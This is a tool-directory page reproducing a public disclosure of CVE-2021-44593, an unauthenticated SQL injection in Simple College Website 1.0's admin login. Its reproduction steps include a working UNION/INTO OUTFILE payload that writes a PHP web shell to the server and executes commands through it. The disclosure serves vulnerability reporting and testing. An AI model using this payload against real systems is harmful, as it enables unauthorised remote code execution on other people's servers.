Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-44593 — Public disclosure and writeup of CVE-2021-44593, an unauthenticated SQL injection in Simple College Website leading to arbitrary file upload and remote code execution. | Kitploit
Tools/GitHubGitHub/mister-joe/cve-2021-44593
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmister-joe/cve-2021-44593

CVE-2021-44593

Public disclosure and writeup of CVE-2021-44593, an unauthenticated SQL injection in Simple College Website leading to arbitrary file upload and remote code execution.

View Repository
224 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-44593

Public disclosure of CVE-2021-44593. A SQL injection/arbitrary file upload/remote code execution vulnerability in Simple College Website.

DESCRIPTION

Simple College Website 1.0 is vulnerable to an unauthenticated union-based SQL injection in the "username" parameter of the /admin/login.php page, which can then be leveraged to upload arbitrary files & gain remote code execution.

COMPONENTS AFFECTED

The function login() in admin_class.php

STEPS TO REPRODUCE

  1. Access the admin login page (usually /admin/login.php)
  2. Submit the login form with the POST parameter "username" containing the following UNION-based SQL injection:
root@kitploit:~
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -
  1. Navigate to /testing.php?cmd=id

NOTES

  1. Knowledge of the web server root directory location is needed.
  2. Knowledge of the document root directory location may also be needed if it is not the same as the web server root directory.
  3. Further, the MySQL daemon needs to have write permissions for said directory.
Download Tool